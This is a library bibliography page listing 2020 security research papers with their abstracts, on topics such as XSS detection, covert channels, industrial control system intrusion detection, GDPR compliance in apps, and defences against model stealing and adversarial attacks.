Visible to the public Biblio

Found 1611 results

Filters: Keyword is security of data  [Clear All Filters]
2021-02-10
Kerschbaumer, C., Ritter, T., Braun, F..  2020.  Hardening Firefox against Injection Attacks. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS PW). :653—663.
Web browsers display content in the form of HTML, CSS and JavaScript retrieved from the world wide web. The loaded content is subject to the web security model and considered untrusted and potentially malicious. To complicate security matters, Firefox uses the same technologies to render its user interface as it does to render untrusted web content which blurs the distinction between the two privilege levels.Getting interactions between the two correct turns out to be complicated and has led to numerous real-world security vulnerabilities. We study those vulnerabilities to discover common threats and explain how we address them systematically to harden Firefox.
Lei, L., Chen, M., He, C., Li, D..  2020.  XSS Detection Technology Based on LSTM-Attention. 2020 5th International Conference on Control, Robotics and Cybernetics (CRC). :175—180.
Cross-site scripting (XSS) is one of the main threats of Web applications, which has great harm. How to effectively detect and defend against XSS attacks has become more and more important. Due to the malicious obfuscation of attack codes and the gradual increase in number, the traditional XSS detection methods have some defects such as poor recognition of malicious attack codes, inadequate feature extraction and low efficiency. Therefore, we present a novel approach to detect XSS attacks based on the attention mechanism of Long Short-Term Memory (LSTM) recurrent neural network. First of all, the data need to be preprocessed, we used decoding technology to restore the XSS codes to the unencoded state for improving the readability of the code, then we used word2vec to extract XSS payload features and map them to feature vectors. And then, we improved the LSTM model by adding attention mechanism, the LSTM-Attention detection model was designed to train and test the data. We used the ability of LSTM model to extract context-related features for deep learning, the added attention mechanism made the model extract more effective features. Finally, we used the classifier to classify the abstract features. Experimental results show that the proposed XSS detection model based on LSTM-Attention achieves a precision rate of 99.3% and a recall rate of 98.2% in the actually collected dataset. Compared with traditional machine learning methods and other deep learning methods, this method can more effectively identify XSS attacks.
Singh, M., Singh, P., Kumar, P..  2020.  An Analytical Study on Cross-Site Scripting. 2020 International Conference on Computer Science, Engineering and Applications (ICCSEA). :1—6.
Cross-Site Scripting, also called as XSS, is a type of injection where malicious scripts are injected into trusted websites. When malicious code, usually in the form of browser side script, is injected using a web application to a different end user, an XSS attack is said to have taken place. Flaws which allows success to this attack is remarkably widespread and occurs anywhere a web application handles the user input without validating or encoding it. A study carried out by Symantic states that more than 50% of the websites are vulnerable to the XSS attack. Security engineers of Microsoft coined the term "Cross-Site Scripting" in January of the year 2000. But even if was coined in the year 2000, XSS vulnerabilities have been reported and exploited since the beginning of 1990's, whose prey have been all the (then) tech-giants such as Twitter, Myspace, Orkut, Facebook and YouTube. Hence the name "Cross-Site" Scripting. This attack could be combined with other attacks such as phishing attack to make it more lethal but it usually isn't necessary, since it is already extremely difficult to deal with from a user perspective because in many cases it looks very legitimate as it's leveraging attacks against our banks, our shopping websites and not some fake malicious website.
Mishra, P., Gupta, C..  2020.  Cookies in a Cross-site scripting: Type, Utilization, Detection, Protection and Remediation. 2020 8th International Conference on Reliability, Infocom Technologies and Optimization (Trends and Future Directions) (ICRITO). :1056—1059.
In accordance to the annual report by the Cisco 2018, web applications are exposed to several security vulnerabilities that are exploited by hackers in various ways. It is becoming more and more frequent, specific and sophisticated. Of all the vulnerabilities, more than 40% of attempts are performed via cross-site scripting (XSS). A number of methods have been postulated to examine such vulnerabilities. Therefore, this paper attempted to address an overview of one such vulnerability: the cookies in the XSS. The objective is to present an overview of the cookies, it's type, vulnerability, policies, discovering, protecting and their mitigation via different tools/methods and via cryptography, artificial intelligence techniques etc. While some future issues, directions, challenges and future research challenges were also being discussed.
Kishimoto, K., Taniguchi, Y., Iguchi, N..  2020.  A Practical Exercise System Using Virtual Machines for Learning Cross-Site Scripting Countermeasures. 2020 IEEE International Conference on Consumer Electronics - Taiwan (ICCE-Taiwan). :1—2.

Cross-site scripting (XSS) is an often-occurring major attack that developers should consider when developing web applications. We develop a system that can provide practical exercises for learning how to create web applications that are secure against XSS. Our system utilizes free software and virtual machines, allowing low-cost, safe, and practical exercises. By using two virtual machines as the web server and the attacker host, the learner can conduct exercises demonstrating both XSS countermeasures and XSS attacks. In our system, learners use a web browser to learn and perform exercises related to XSS. Experimental evaluations confirm that the proposed system can support learning of XSS countermeasures.

Huang, H., Wang, X., Jiang, Y., Singh, A. K., Yang, M., Huang, L..  2020.  On Countermeasures Against the Thermal Covert Channel Attacks Targeting Many-core Systems. 2020 57th ACM/IEEE Design Automation Conference (DAC). :1—6.
Although it has been demonstrated in multiple studies that serious data leaks could occur to many-core systems thanks to the existence of the thermal covert channels (TCC), little has been done to produce effective countermeasures that are necessary to fight against such TCC attacks. In this paper, we propose a three-step countermeasure to address this critical defense issue. Specifically, the countermeasure includes detection based on signal frequency scanning, positioning affected cores, and blocking based on Dynamic Voltage Frequency Scaling (DVFS) technique. Our experiments have confirmed that on average 98% of the TCC attacks can be detected, and with the proposed defense, the bit error rate of a TCC attack can soar to 92%, literally shutting down the attack in practical terms. The performance penalty caused by the inclusion of the proposed countermeasures is only 3% for an 8×8 system.
Xie, J., Chen, Y., Wang, L., Wang, Z..  2020.  A Network Covert Timing Channel Detection Method Based on Chaos Theory and Threshold Secret Sharing. 2020 IEEE 4th Information Technology, Networking, Electronic and Automation Control Conference (ITNEC). 1:2380—2384.

Network covert timing channel(NCTC) is a process of transmitting hidden information by means of inter-packet delay (IPD) of legitimate network traffic. Their ability to evade traditional security policies makes NCTCs a grave security concern. However, a robust method that can be used to detect a large number of NCTCs is missing. In this paper, a NCTC detection method based on chaos theory and threshold secret sharing is proposed. Our method uses chaos theory to reconstruct a high-dimensional phase space from one-dimensional time series and extract the unique and stable channel traits. Then, a channel identifier is constructed using the secret reconstruction strategy from threshold secret sharing to realize the mapping of the channel features to channel identifiers. Experimental results show that the approach can detect varieties of NCTCs with a guaranteed true positive rate and greatly improve the versatility and robustness.

2021-02-08
Mathur, G., Pandey, A., Goyal, S..  2020.  Immutable DNA Sequence Data Transmission for Next Generation Bioinformatics Using Blockchain Technology. 2nd International Conference on Data, Engineering and Applications (IDEA). :1–6.
In recent years, there is fast growth in the high throughput DNA sequencing technology, and also there is a reduction in the cost of genome-sequencing, that has led to a advances in the genetic industries. However, the reduction in cost and time required for DNA sequencing there is still an issue of managing such large amount of data. Also, the security and transmission of such huge amount of DNA sequence data is still an issue. The idea is to provide a secure storage platform for future generation bioinformatics systems for both researchers and healthcare user. Secure data sharing strategies, that can permit the healthcare providers along with their secured substances for verifying the accuracy of data, are crucial for ensuring proper medical services. In this paper, it has been surveyed about the applications of blockchain technology for securing healthcare data, where the recorded information is encrypted so that it becomes difficult to penetrate or being removed, as the primary goals of block-chaining technology is to make data immutable.
Pelissero, N., Laso, P. M., Puentes, J..  2020.  Naval cyber-physical anomaly propagation analysis based on a quality assessed graph. 2020 International Conference on Cyber Situational Awareness, Data Analytics and Assessment (CyberSA). :1–8.
As any other infrastructure relying on cyber-physical systems (CPS), naval CPS are highly interconnected and collect considerable data streams, on which depend multiple command and navigation decisions. Being a data-driven decision system requiring optimized supervisory control on a permanent basis, it is critical to examine the CPS vulnerability to anomalies and their propagation. This paper presents an approach to detect CPS anomalies and estimate their propagation applying a quality assessed graph, which represents the CPS physical and digital subsystems, combined with system variables dependencies and a set of data and information quality measures vectors. Following the identification of variables dependencies and high-risk nodes in the CPS, data and information quality measures reveal how system variables are modified when an anomaly is detected, also indicating its propagation path. Taking as reference the normal state of a naval propulsion management system, four anomalies in the form of cyber-attacks - port scan, programmable logical controller stop, and man in the middle to change the motor speed and operation of a tank valve - were produced. Three anomalies were properly detected and their propagation path identified. These results suggest the feasibility of anomaly detection and estimation of propagation estimation in CPS, applying data and information quality analysis to a system graph.
2021-02-03
Bahaei, S. Sheikh.  2020.  A Framework for Risk Assessment in Augmented Reality-Equipped Socio-Technical Systems. 2020 50th Annual IEEE-IFIP International Conference on Dependable Systems and Networks-Supplemental Volume (DSN-S). :77—78.

New technologies, such as augmented reality (AR) are used to enhance human capabilities and extend human functioning; nevertheless they may cause distraction and incorrect human functioning. Systems including socio entities (such as human) and technical entities (such as augmented reality) are called socio-technical systems. In order to do risk assessment in such systems, considering new dependability threats caused by augmented reality is essential, for example failure of an extended human function is a new type of dependability threat introduced to the system because of new technologies. In particular, it is required to identify these new dependability threats and extend modeling and analyzing techniques to be able to uncover their potential impacts. This research aims at providing a framework for risk assessment in AR-equipped socio-technical systems by identifying AR-extended human failures and AR-caused faults leading to human failures. Our work also extends modeling elements in an existing metamodel for modeling socio-technical systems, to enable AR-relevant dependability threats modeling. This extended metamodel is expected to be used for extending analysis techniques to analyze AR-equipped socio-technical systems.

Liu, H., Zhou, Z., Zhang, M..  2020.  Application of Optimized Bidirectional Generative Adversarial Network in ICS Intrusion Detection. 2020 Chinese Control And Decision Conference (CCDC). :3009—3014.

Aiming at the problem that the traditional intrusion detection method can not effectively deal with the massive and high-dimensional network traffic data of industrial control system (ICS), an ICS intrusion detection strategy based on bidirectional generative adversarial network (BiGAN) is proposed in this paper. In order to improve the applicability of BiGAN model in ICS intrusion detection, the optimal model was obtained through the single variable principle and cross-validation. On this basis, the supervised control and data acquisition (SCADA) standard data set is used for comparative experiments to verify the performance of the optimized model on ICS intrusion detection. The results show that the ICS intrusion detection method based on optimized BiGAN has higher accuracy and shorter detection time than other methods.

Rehan, S., Singh, R..  2020.  Industrial and Home Automation, Control, Safety and Security System using Bolt IoT Platform. 2020 International Conference on Smart Electronics and Communication (ICOSEC). :787—793.
This paper describes a system that comprises of control, safety and security subsystem for industries and homes. The entire system is based on the Bolt IoT platform. Using this system, the user can control the devices such as LEDs, speed of the fan or DC motor, monitor the temperature of the premises with an alert sub-system for critical temperatures through SMS and call, monitor the presence of anyone inside the premises with an alert sub-system about any intrusion through SMS and call. If the system is used specifically in any industry then instead of monitoring the temperature any other physical quantity, which is critical for that industry, can be monitored using suitable sensors. In addition, the cloud connectivity is provided to the system using the Bolt IoT module and temperature data is sent to the cloud where using machine-learning algorithm the future temperature is predicted to avoid any accidents in the future.
Ani, U. D., He, H., Tiwari, A..  2020.  Vulnerability-Based Impact Criticality Estimation for Industrial Control Systems. 2020 International Conference on Cyber Security and Protection of Digital Services (Cyber Security). :1—8.

Cyber threats directly affect the critical reliability and availability of modern Industry Control Systems (ICS) in respects of operations and processes. Where there are a variety of vulnerabilities and cyber threats, it is necessary to effectively evaluate cyber security risks, and control uncertainties of cyber environments, and quantitative evaluation can be helpful. To effectively and timely control the spread and impact produced by attacks on ICS networks, a probabilistic Multi-Attribute Vulnerability Criticality Analysis (MAVCA) model for impact estimation and prioritised remediation is presented. This offer a new approach for combining three major attributes: vulnerability severities influenced by environmental factors, the attack probabilities relative to the vulnerabilities, and functional dependencies attributed to vulnerability host components. A miniature ICS testbed evaluation illustrates the usability of the model for determining the weakest link and setting security priority in the ICS. This work can help create speedy and proactive security response. The metrics derived in this work can serve as sub-metrics inputs to a larger quantitative security metrics taxonomy; and can be integrated into the security risk assessment scheme of a larger distributed system.

Chernov, D., Sychugov, A..  2020.  Determining the Hazard Quotient of Destructive Actions of Automated Process Control Systems Information Security Violator. 2020 International Russian Automation Conference (RusAutoCon). :566—570.
The purpose of the work is a formalized description of the method determining numerical expression of the danger from actions potentially implemented by an information security violator. The implementation of such actions may lead to a disruption of the ordered functioning of multilevel distributed automated process control systems, which indicates the importance of developing new adequate solutions for predicting attacks consequences. The analysis of the largest destructive effects on information security systems of critical objects is carried out. The most common methods of obtaining the value of the hazard quotient of information security violators' destructive actions are considered. Based on the known methods for determining the possible damage from attacks implemented by a potential information security violator, a new, previously undetected in open sources method for determining the hazard quotient of destructive actions of an information security violator has been proposed. In order to carry out experimental calculations by the proposed method, the authors developed the required software. The calculations results are presented and indicate the possibility of using the proposed method for modeling threats and information security violators when designing an information security system for automated process control systems.
2021-02-01
Calhoun, C. S., Reinhart, J., Alarcon, G. A., Capiola, A..  2020.  Establishing Trust in Binary Analysis in Software Development and Applications. 2020 IEEE International Conference on Human-Machine Systems (ICHMS). :1–4.
The current exploratory study examined software programmer trust in binary analysis techniques used to evaluate and understand binary code components. Experienced software developers participated in knowledge elicitations to identify factors affecting trust in tools and methods used for understanding binary code behavior and minimizing potential security vulnerabilities. Developer perceptions of trust in those tools to assess implementation risk in binary components were captured across a variety of application contexts. The software developers reported source security and vulnerability reports provided the best insight and awareness of potential issues or shortcomings in binary code. Further, applications where the potential impact to systems and data loss is high require relying on more than one type of analysis to ensure the binary component is sound. The findings suggest binary analysis is viable for identifying issues and potential vulnerabilities as part of a comprehensive solution for understanding binary code behavior and security vulnerabilities, but relying simply on binary analysis tools and binary release metadata appears insufficient to ensure a secure solution.
2021-01-28
Li, Y., Chen, J., Li, Q., Liu, A..  2020.  Differential Privacy Algorithm Based on Personalized Anonymity. 2020 5th IEEE International Conference on Big Data Analytics (ICBDA). :260—267.

The existing anonymized differential privacy model adopts a unified anonymity method, ignoring the difference of personal privacy, which may lead to the problem of excessive or insufficient protection of the original data [1]. Therefore, this paper proposes a personalized k-anonymity model for tuples (PKA) and proposes a differential privacy data publishing algorithm (DPPA) based on personalized anonymity, firstly based on the tuple personality factor set by the user in the original data set. The values are classified and the corresponding privacy protection relevance is calculated. Then according to the tuple personality factor classification value, the data set is clustered by clustering method with different anonymity, and the quasi-identifier attribute of each cluster is aggregated and noise-added to realize anonymized differential privacy; finally merge the subset to get the data set that meets the release requirements. In this paper, the correctness of the algorithm is analyzed theoretically, and the feasibility and effectiveness of the proposed algorithm are verified by comparison with similar algorithms.

Fan, M., Yu, L., Chen, S., Zhou, H., Luo, X., Li, S., Liu, Y., Liu, J., Liu, T..  2020.  An Empirical Evaluation of GDPR Compliance Violations in Android mHealth Apps. 2020 IEEE 31st International Symposium on Software Reliability Engineering (ISSRE). :253—264.

The purpose of the General Data Protection Regulation (GDPR) is to provide improved privacy protection. If an app controls personal data from users, it needs to be compliant with GDPR. However, GDPR lists general rules rather than exact step-by-step guidelines about how to develop an app that fulfills the requirements. Therefore, there may exist GDPR compliance violations in existing apps, which would pose severe privacy threats to app users. In this paper, we take mobile health applications (mHealth apps) as a peephole to examine the status quo of GDPR compliance in Android apps. We first propose an automated system, named HPDROID, to bridge the semantic gap between the general rules of GDPR and the app implementations by identifying the data practices declared in the app privacy policy and the data relevant behaviors in the app code. Then, based on HPDROID, we detect three kinds of GDPR compliance violations, including the incompleteness of privacy policy, the inconsistency of data collections, and the insecurity of data transmission. We perform an empirical evaluation of 796 mHealth apps. The results reveal that 189 (23.7%) of them do not provide complete privacy policies. Moreover, 59 apps collect sensitive data through different measures, but 46 (77.9%) of them contain at least one inconsistent collection behavior. Even worse, among the 59 apps, only 8 apps try to ensure the transmission security of collected data. However, all of them contain at least one encryption or SSL misuse. Our work exposes severe privacy issues to raise awareness of privacy protection for app users and developers.

Siddiquie, K., Shafqat, N., Masood, A., Abbas, H., Shahid, W. b.  2020.  Profiling Vulnerabilities Threatening Dual Persona in Android Framework. 2019 International Conference on Advances in the Emerging Computing Technologies (AECT). :1—6.

Enterprises round the globe have been searching for a way to securely empower AndroidTM devices for work but have spurned away from the Android platform due to ongoing fragmentation and security concerns. Discrepant vulnerabilities have been reported in Android smartphones since Android Lollipop release. Smartphones can be easily hacked by installing a malicious application, visiting an infectious browser, receiving a crafted MMS, interplaying with plug-ins, certificate forging, checksum collisions, inter-process communication (IPC) abuse and much more. To highlight this issue a manual analysis of Android vulnerabilities is performed, by using data available in National Vulnerability Database NVD and Android Vulnerability website. This paper includes the vulnerabilities that risked the dual persona support in Android 5 and above, till Dec 2017. In our security threat analysis, we have identified a comprehensive list of Android vulnerabilities, vulnerable Android versions, manufacturers, and information regarding complete and partial patches released. So far, there is no published research work that systematically presents all the vulnerabilities and vulnerability assessment for dual persona feature of Android's smartphone. The data provided in this paper will open ways to future research and present a better Android security model for dual persona.

Kariyappa, S., Qureshi, M. K..  2020.  Defending Against Model Stealing Attacks With Adaptive Misinformation. 2020 IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR). :767—775.

Deep Neural Networks (DNNs) are susceptible to model stealing attacks, which allows a data-limited adversary with no knowledge of the training dataset to clone the functionality of a target model, just by using black-box query access. Such attacks are typically carried out by querying the target model using inputs that are synthetically generated or sampled from a surrogate dataset to construct a labeled dataset. The adversary can use this labeled dataset to train a clone model, which achieves a classification accuracy comparable to that of the target model. We propose "Adaptive Misinformation" to defend against such model stealing attacks. We identify that all existing model stealing attacks invariably query the target model with Out-Of-Distribution (OOD) inputs. By selectively sending incorrect predictions for OOD queries, our defense substantially degrades the accuracy of the attacker's clone model (by up to 40%), while minimally impacting the accuracy (\textbackslashtextless; 0.5%) for benign users. Compared to existing defenses, our defense has a significantly better security vs accuracy trade-off and incurs minimal computational overhead.

Collins, B. C., Brown, P. N..  2020.  Exploiting an Adversary’s Intentions in Graphical Coordination Games. 2020 American Control Conference (ACC). :4638—4643.

How does information regarding an adversary's intentions affect optimal system design? This paper addresses this question in the context of graphical coordination games where an adversary can indirectly influence the behavior of agents by modifying their payoffs. We study a situation in which a system operator must select a graph topology in anticipation of the action of an unknown adversary. The designer can limit her worst-case losses by playing a security strategy, effectively planning for an adversary which intends maximum harm. However, fine-grained information regarding the adversary's intention may help the system operator to fine-tune the defenses and obtain better system performance. In a simple model of adversarial behavior, this paper asks how much a system operator can gain by fine-tuning a defense for known adversarial intent. We find that if the adversary is weak, a security strategy is approximately optimal for any adversary type; however, for moderately-strong adversaries, security strategies are far from optimal.

Seiler, M., Trautmann, H., Kerschke, P..  2020.  Enhancing Resilience of Deep Learning Networks By Means of Transferable Adversaries. 2020 International Joint Conference on Neural Networks (IJCNN). :1—8.

Artificial neural networks in general and deep learning networks in particular established themselves as popular and powerful machine learning algorithms. While the often tremendous sizes of these networks are beneficial when solving complex tasks, the tremendous number of parameters also causes such networks to be vulnerable to malicious behavior such as adversarial perturbations. These perturbations can change a model's classification decision. Moreover, while single-step adversaries can easily be transferred from network to network, the transfer of more powerful multi-step adversaries has - usually - been rather difficult.In this work, we introduce a method for generating strong adversaries that can easily (and frequently) be transferred between different models. This method is then used to generate a large set of adversaries, based on which the effects of selected defense methods are experimentally assessed. At last, we introduce a novel, simple, yet effective approach to enhance the resilience of neural networks against adversaries and benchmark it against established defense methods. In contrast to the already existing methods, our proposed defense approach is much more efficient as it only requires a single additional forward-pass to achieve comparable performance results.

Wang, W., Tang, B., Zhu, C., Liu, B., Li, A., Ding, Z..  2020.  Clustering Using a Similarity Measure Approach Based on Semantic Analysis of Adversary Behaviors. 2020 IEEE Fifth International Conference on Data Science in Cyberspace (DSC). :1—7.

Rapidly growing shared information for threat intelligence not only helps security analysts reduce time on tracking attacks, but also bring possibilities to research on adversaries' thinking and decisions, which is important for the further analysis of attackers' habits and preferences. In this paper, we analyze current models and frameworks used in threat intelligence that suited to different modeling goals, and propose a three-layer model (Goal, Behavior, Capability) to study the statistical characteristics of APT groups. Based on the proposed model, we construct a knowledge network composed of adversary behaviors, and introduce a similarity measure approach to capture similarity degree by considering different semantic links between groups. After calculating similarity degrees, we take advantage of Girvan-Newman algorithm to discover community groups, clustering result shows that community structures and boundaries do exist by analyzing the behavior of APT groups.

2021-01-25
Hu, W., Zhang, L., Liu, X., Huang, Y., Zhang, M., Xing, L..  2020.  Research on Automatic Generation and Analysis Technology of Network Attack Graph. 2020 IEEE 6th Intl Conference on Big Data Security on Cloud (BigDataSecurity), IEEE Intl Conference on High Performance and Smart Computing, (HPSC) and IEEE Intl Conference on Intelligent Data and Security (IDS). :133–139.
In view of the problem that the overall security of the network is difficult to evaluate quantitatively, we propose the edge authority attack graph model, which aims to make up for the traditional dependence attack graph to describe the relationship between vulnerability behaviors. This paper proposed a network security metrics based on probability, and proposes a network vulnerability algorithm based on vulnerability exploit probability and attack target asset value. Finally, a network security reinforcement algorithm with network vulnerability index as the optimization target is proposed based on this metric algorithm.
Chen, J., Lin, X., Shi, Z., Liu, Y..  2020.  Link Prediction Adversarial Attack Via Iterative Gradient Attack. IEEE Transactions on Computational Social Systems. 7:1081–1094.
Increasing deep neural networks are applied in solving graph evolved tasks, such as node classification and link prediction. However, the vulnerability of deep models can be revealed using carefully crafted adversarial examples generated by various adversarial attack methods. To explore this security problem, we define the link prediction adversarial attack problem and put forward a novel iterative gradient attack (IGA) strategy using the gradient information in the trained graph autoencoder (GAE) model. Not surprisingly, GAE can be fooled by an adversarial graph with a few links perturbed on the clean one. The results on comprehensive experiments of different real-world graphs indicate that most deep models and even the state-of-the-art link prediction algorithms cannot escape the adversarial attack, such as GAE. We can benefit the attack as an efficient privacy protection tool from the link prediction of unknown violations. On the other hand, the adversarial attack is a robust evaluation metric for current link prediction algorithms of their defensibility.
Mao, J., Li, X., Lin, Q., Guan, Z..  2020.  Deeply understanding graph-based Sybil detection techniques via empirical analysis on graph processing. China Communications. 17:82–96.
Sybil attacks are one of the most prominent security problems of trust mechanisms in a distributed network with a large number of highly dynamic and heterogeneous devices, which expose serious threat to edge computing based distributed systems. Graphbased Sybil detection approaches extract social structures from target distributed systems, refine the graph via preprocessing methods and capture Sybil nodes based on the specific properties of the refined graph structure. Graph preprocessing is a critical component in such Sybil detection methods, and intuitively, the processing methods will affect the detection performance. Thoroughly understanding the dependency on the graph-processing methods is very important to develop and deploy Sybil detection approaches. In this paper, we design experiments and conduct systematic analysis on graph-based Sybil detection with respect to different graph preprocessing methods on selected network environments. The experiment results disclose the sensitivity caused by different graph transformations on accuracy and robustness of Sybil detection methods.